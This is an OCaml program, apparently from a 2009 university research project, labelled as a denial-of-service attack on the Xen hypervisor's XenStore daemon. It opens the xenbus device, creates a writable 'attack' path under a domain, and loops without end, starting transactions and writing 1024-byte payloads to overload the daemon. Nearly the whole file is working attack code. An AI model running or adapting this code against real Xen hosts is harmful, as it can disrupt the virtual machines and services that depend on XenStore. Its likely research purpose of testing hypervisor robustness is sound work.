(* 
    DoS attack on XenStore Daemon.
    Copyright (C) 2009 Patrick Colp University of British Columbia

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*)

let xenbus_dev = "/proc/xen/xenbus"

let xenbus_open dev =
  Unix.openfile dev [ Unix.O_RDWR ] 0o600

let fd = xenbus_open xenbus_dev
let in_set = ref [ fd ]
let out_set = ref [ fd ]

let rec read connection =
  let (i, o, _) = Unix.select [ fd ] [ fd ] [] (0.0) in

  in_set := i;
  out_set := o;
  
  if connection#can_read
  then
    match (connection#read) with
    | Some (message) -> message
    | None -> read connection
  else read connection

let get_domain_path connection transaction_id domain_id =
  connection#write (Message.make Message.XS_GET_DOMAIN_PATH transaction_id 0l (Utils.null_terminate (string_of_int domain_id)));
  Utils.strip_null (read connection).Message.payload

let mkdir connection transaction_id path =
  connection#write (Message.make Message.XS_MKDIR transaction_id 0l (Utils.null_terminate path));
  (Utils.strip_null (read connection).Message.payload) = "OK"

let transaction_start connection =
  connection#write (Message.make Message.XS_TRANSACTION_START 0l 0l (Utils.null_terminate Constants.null_string));
  Int32.of_string (Utils.strip_null (read connection).Message.payload)

let transaction_end connection transaction_id =
  connection#write (Message.make Message.XS_TRANSACTION_END transaction_id 0l (Utils.null_terminate "T"));
  (Utils.strip_null (read connection).Message.payload) = "OK"

let write connection transaction_id path value =
  connection#write (Message.make Message.XS_WRITE transaction_id 0l ((Utils.null_terminate path) ^ value));
  (Utils.strip_null (read connection).Message.payload) = "OK"

let find_attack_path connection =
  let rec find_loop domain_id = (
    let domain_path = get_domain_path connection 0l domain_id in
    let attack_path = domain_path ^ Store.dividor_str ^ "device" ^ Store.dividor_str ^ "attack" in
    if domain_id <= 0
    then Constants.null_string
    else if mkdir connection 0l attack_path
    then attack_path
    else find_loop (succ domain_id)
  )
  in
  find_loop 1

let _ =
  Printf.printf "Initialising attack...\n"; flush stdout;
  
  let verbose = ref false
  and tx_count = ref 0l
  and tx_fail_count = ref 0l in
  
  (* Parse command-line arguments *)
  Arg.parse [
    ("--verbose", Arg.Set verbose, "   print stats when a transaction fails");
    ] (fun s -> ()) "";
  
  let connection = new Connection.connection (new Socket.socket_interface fd true in_set out_set) in
  
  Printf.printf "Initialised\n"; flush stdout;

  let attack_path = find_attack_path connection
  and attack_payload = String.make 1024 'a' in

  if attack_path <> Constants.null_string
  then (
    Printf.printf "Attack path found: %s\n" attack_path;
    Printf.printf "Attacking...\n"; flush stdout;
    let rec attack_loop () = (
        let transaction_id = transaction_start connection in
        if write connection transaction_id attack_path attack_payload
        then (
          tx_count := Int32.succ !tx_count;
          if not (transaction_end connection transaction_id)
          then (
            tx_fail_count := Int32.succ !tx_fail_count;
            if !verbose
            then
              Printf.printf "transaction %ld failed (%ld of %ld, %ld%%)\n" transaction_id !tx_fail_count !tx_count (Int32.div (Int32.mul !tx_fail_count 100l) !tx_count);
              flush stdout
          );
          attack_loop ()
        )
      )
    in
    attack_loop ()
  );
  
  Printf.printf "\nDone\n"; flush stdout

